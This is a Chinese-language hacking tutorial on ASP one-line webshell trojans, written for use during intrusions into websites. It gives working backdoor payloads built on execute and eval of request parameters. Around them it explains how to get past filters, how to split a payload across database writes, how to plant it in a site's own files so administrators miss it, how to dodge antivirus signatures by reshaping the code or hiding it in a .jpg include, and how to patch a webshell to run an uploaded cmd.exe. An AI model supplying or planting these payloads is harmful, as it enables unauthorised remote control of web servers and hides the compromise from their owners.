在入侵過程中,我們常常會(huì)遇到這樣的問題,因?yàn)榇篑R太大,而不能上傳,怎么辦,這個(gè)時(shí)候就只能用小馬來輔助,但是,小馬的語(yǔ)句又被殺,今天我們來說說一句話小馬的免殺方法
眾所周之,一句話的語(yǔ)句是<%execute request("密碼")%>
1.入侵過程中<%,%>符號(hào)被過濾怎么辦?我們可以想辦法避開<%,%>
<scriptlanguage=VBScript runat=server>execute request("cmd")</Script>
2.網(wǎng)絡(luò)中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎么辦?將木馬分開寫就好了!
<%Y=request("x")%> <%execute(Y)%> [code]
這樣分開寫提交到數(shù)據(jù)庫(kù)就沒問題了!
不過,在ACCESS數(shù)據(jù)庫(kù)中新增加的數(shù)據(jù)物理位置是在舊數(shù)據(jù)之前的,所以要先寫<%execute(Y)%>部分。寫好后在客戶端寫密碼時(shí)除了填寫"x"以外的任何字符都可以,如果填了"x"就會(huì)出錯(cuò)!
3.插入一句話容易爆錯(cuò),例如
[code]
Sub unlockPost()
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
寫成
Sub unlockPost(<%eval request("#")%>)
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
就可以了,也可以寫成帶容錯(cuò)語(yǔ)句的格式??!
<%if request("cmd")<>""then execute request("cmd")%>
4.一句話木馬到兩句話木馬的轉(zhuǎn)型!
一句話木馬服務(wù)端原型:<%execute request("value")%> ,
變形后:<%On Error Resume Next execute request("value")%> ,
至于為什么要用兩句話木馬呢,是由于使我們的后門更加隱蔽。
我也試過用一句話插入WellShell的某個(gè)asp文件里面,可是訪問時(shí)經(jīng)常出錯(cuò),而插入兩句話木馬服務(wù)端卻可以正常訪問了,對(duì)站點(diǎn)的頁(yè)面無任何影響。
這樣就達(dá)到了隱蔽性更強(qiáng)的目的了,他管理員總不會(huì)連自己的網(wǎng)頁(yè)文件都刪了吧。
現(xiàn)在我的WellShell都有這樣的后門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入。當(dāng)然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端,不用修改。
5.一句話免殺:
一:變形法
比如:eval(request("#"))這樣的馬兒呢,一般情況下是不被殺的。但實(shí)際上,經(jīng)常殺毒軟件會(huì)把eval(request列為特征碼。所以我們變形一下
E=request("id")
eval(E)
這樣可達(dá)到免殺的目的。
例如:<%execute request("1")%>變形后:
<%E=request("1")
execute E%>
當(dāng)然,這種變形是最好做的。
介紹第二種方法:因?yàn)楹芏喙芾韱T很聰明,它會(huì)檢查ASP文件中的execute和eval函數(shù)。所以呢,不管你怎么反編譯,它最終總是要用其中的一個(gè)函數(shù) 來解釋運(yùn)行,所以還是被發(fā)現(xiàn)了。好么,我們用外部文件來調(diào)用。建一個(gè)a.jpg或者任何不被發(fā)現(xiàn)的文件后綴或文件名。寫入 execute(request("#"))當(dāng)然,你可以先變形后現(xiàn)放上去。然后在asp文件中插入
<!--#include file="a.jpg" -->
來引用它,即可。
不過,管理員可以通過對(duì)比文件的方式找到修改過的文件,不過這種情況不多
6.在WEBSHELL中使用命令提示
在 使用ASP站長(zhǎng)助手6.0時(shí)點(diǎn)擊命令提示符顯示“沒有權(quán)限”的時(shí)候,可以使用asp站長(zhǎng)助手上傳CMD.exe到你的WEBSHELL目錄(其它目錄也 行,把上傳以后的CMD.exe絕對(duì)路徑COPY出來),再修改你的WEBSHELL找到調(diào)用CMD.EXE的代碼。原來的代碼如下
.exec("cmd.exe /c "&DefCmd).stdout.readall
修改為
.exec("你想上傳的cmd.exe絕對(duì)路徑" /c"&DefCmd).stdout.readall
比如你上傳到的目錄是D:\web\www\cmd.exe,那么就修改成
.exec("D:\web\www\cmd.exe /c"&DefCmd).stdout.readall
聯(lián)系客服